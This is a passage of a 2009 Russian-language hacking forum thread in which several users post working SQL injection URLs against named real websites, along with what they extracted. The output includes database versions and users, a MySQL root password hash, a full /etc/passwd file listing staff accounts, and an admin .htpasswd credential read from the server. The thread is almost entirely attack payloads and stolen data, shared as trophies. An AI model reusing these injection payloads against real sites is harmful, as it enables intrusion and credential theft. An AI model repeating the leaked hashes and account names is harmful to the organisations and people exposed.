ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8211  
Старый 08.03.2009, 05:31
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.mada-tourisme-durable.org/en/theme.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5--
юзер/версия/бд:
Код:
5.0.68-log:entreprigo2mef@10.0.63.89:entreprigo2mef
 
Ответить с цитированием

  #8212  
Старый 08.03.2009, 10:37
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.dermis.ru/main.phtml?did=-999999999'+union+select+1,2/*
user():database():version()
dermis@localhost:dermis:4.1.11
Вывод в <title>. Юзаем конверт либо хекс(анхекс())
 
Ответить с цитированием

  #8213  
Старый 08.03.2009, 10:58
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.aomo.ru/blank.php?id=-1836%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,concat_ws(0x3a,login,passwd),50%20from%20 user_c%20limit%201,1--

5.0.23
 
Ответить с цитированием

  #8214  
Старый 08.03.2009, 11:12
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.colasbelgium.be/colas/NL/GrDRHBeroep2.php?IDM=-1+union+all+select+0,1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--
юзер/версия/бд:

Код:
4.1.21-standard-log:fxmuncbb_colasb@localhost:fxmuncbb_colas
 
Ответить с цитированием

  #8215  
Старый 08.03.2009, 11:41
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.jobbank.ro/jobseekers/job_view.php?job_id=-7548+union+select+1,2,version(),database(),user(), 6,7,8,9,10,11,12,13,14


Database Version: 5.0.67-community
Database name: jobbank_jobbank
User name: jobbank_jobbank@localhost
 
Ответить с цитированием

  #8216  
Старый 08.03.2009, 12:06
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.campingduinoord.nl/havenloods/index.php?num=-1+union+all+select+0,1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7--
юзер/версия/бд:

Код:
5.0.67-community:campingd_@localhost:campingd_havenloods
 
Ответить с цитированием

  #8217  
Старый 08.03.2009, 12:38
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ior.ro/produse/index.php?kCtg=8&ID=-13+union+select+1,2,3,4,convert(concat_ws(0x3a,ver sion(),database(),user())+using+latin1),6,7,8,9,10/*



Database Version: 4.1.11-Debian_4sarge7-log
Database name: dbior
User name: ior@localhost
 
Ответить с цитированием

diabetes.ee
  #8218  
Старый 08.03.2009, 15:13
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию diabetes.ee

Код:
http://www.diabetes.ee/seltsid/jogeva/?lk=-29145+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
5.0.67
таблица админов - tabSeltsiAdmin
PR: 5
 
Ответить с цитированием

  #8219  
Старый 08.03.2009, 18:01
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+concat_ ws(0x3a,version (),database(),user()),2,3--
Database Version : 5.0.67
Database name : personal-s
User name : root@localhost


читаем /etc/passwd:

Код:
# $FreeBSD: src/etc/master.passwd,v 1.40
 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie
 &:/root:/bin/csh toor:*:0:0:Bourne-again
 Superuser:/root: daemon:*:1:1:Owner of many system
 processes:/root:/usr/sbin/nologin operator:*:2:5:System
 &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and 
Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:
/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:
/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr
/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:
/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share
/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell 
Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25:Sendmail Submission User:/var/spool
/clientmqueue:/usr/sbin/nologin 
mailnull:*:26:26:Sendmail Default User:/var/spool
/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:
/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin 
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin
/nologin _dhcp:*:65:65:dhcp programs:/var/empty:
/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var
/spool/uucppublic:/usr/local/libexec/uucp/uucico 
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin
/nologin www:*:80:80:World Wide Web 
Owner:/nonexistent:/usr/sbin/nologin 
nobody:*:65534:65534:Unprivileged user:/nonexistent:
/usr/sbin/nologin techsupport:*:100:100:Technical 
support group:/home/techsupport:/bin/sh 
squid:*:1001:1001:Squid proxy-caching web server's 
user:/nonexistent:/sbin/nologin clamav:*:106:106:Clam
 Antivirus:/nonexistent:/sbin/nologin
 spamd:*:58:58:SpamAssassin user:/var/spool/spamd:
/sbin/nologin v_kalinnikova:*:100:102:Email user:/home
/v_kalinnikova:/sbin/nologin office:*:101:102:Email 
user:/home/office:/sbin/nologin 
i_androsova:*:102:102:Email user:/home/i_androsova:
/sbin/nologin n_blagodatskaya:*:103:102:Email
 user:/home/n_blagodatskaya:/sbin/nologin 
i_gorlova:*:104:102:Email user:/home/i_gorlova:
/sbin/nologin p_reberka:*:105:102:Email user:/home
/p_reberka:/sbin/nologin 
y_mitrophanova:*:106:102:Email user:/home
/y_mitrophanova:/sbin/nologin bnv:*:107:102:Email
 user:/home/bnv:/sbin/nologin rpv:*:108:102:Email 
user:/home/rpv:/sbin/nologin 
k_tishenina:*:109:102:Email user:/home/k_tishenina:
/sbin/nologin oas:*:110:102:Email user:/home/hpa:/sbin
/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:
/sbin/nologin backup:*:111:101:BackUp user:/var/Samba
/BackUp:/sbin/nologin a_markova:*:112:102:Email 
user:/home/a_markova:/sbin/nologin 
a_morokova:*:113:102:Email user:/home/a_morokova:
/sbin/nologin kmv:*:114:102:Email user:/home/omv:/sbin
/nologin ask:*:115:102:Email user:/home/ask:/sbin
/nologin bilenko:*:116:102:Email user:/home/ask:/sbin
/nologin e_kruglova:*:117:102:Email user:/home
/e_kruglova:/sbin/nologin gmp:*:118:102:Email 
user:/home/gmp:/sbin/nologin mea:*:118:102:Email 
user:/home/mea:/sbin/nologin konkurs:*:118:102:Email 
user:/home/konkurs:/sbin/nologin 
mailrobot:*:119:102:Email user:/home/mailrobot:
/sbin/nologin
оййй на чтой-то мы тут наткнулись :

Код:
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+LOAD_ FILE(0x2f686f6d652f74656368737570706f72742f2e6874706173737764), 2,3--
Код:
admin:NriRkf2e6iPFA
 
Ответить с цитированием

  #8220  
Старый 08.03.2009, 18:08
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.nipne.ro/events/seminar/index.php?id=876875433456646876+union+select+1,2,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9,10,11--

Database Version: 4.1.22
Database name: ifin-hh
User name: admusr@localhost



Цитата:
http://www.nipne.ro/events/seminar/index.php?id=876875433456646876+union+select+1,2,3 ,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+fro m+mysql.user--
root : 556eba5e26cdd0e1



Цитата:
http://www.dentex.ro/index.php?id=90779888490+union+select+1,concat_ws( 0x3a,version(),user(),database()),3--
Version:4.1.22-standard-log
User:bluetech@localhost
Database:bluetech_prod


Цитата:
http://www.laguna-showroom.ro/stire.php?lang=en&id=7987987646987987+union+select +1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),use r(),database()),12,13,14,15,16--&name=Ceramica-Ribesalbes---colors-for-tiles-with-personality-!
Version:5.0.67-community
User:bravo@localhost
Database:bravo


Цитата:
http://www.imobilenoi.ro/?action=articles&id=798756544347987/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4--

Version:5.0.67-community
User:imobilen_imnoi@localhost
Database:imobilen_imnoi
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT.XYZ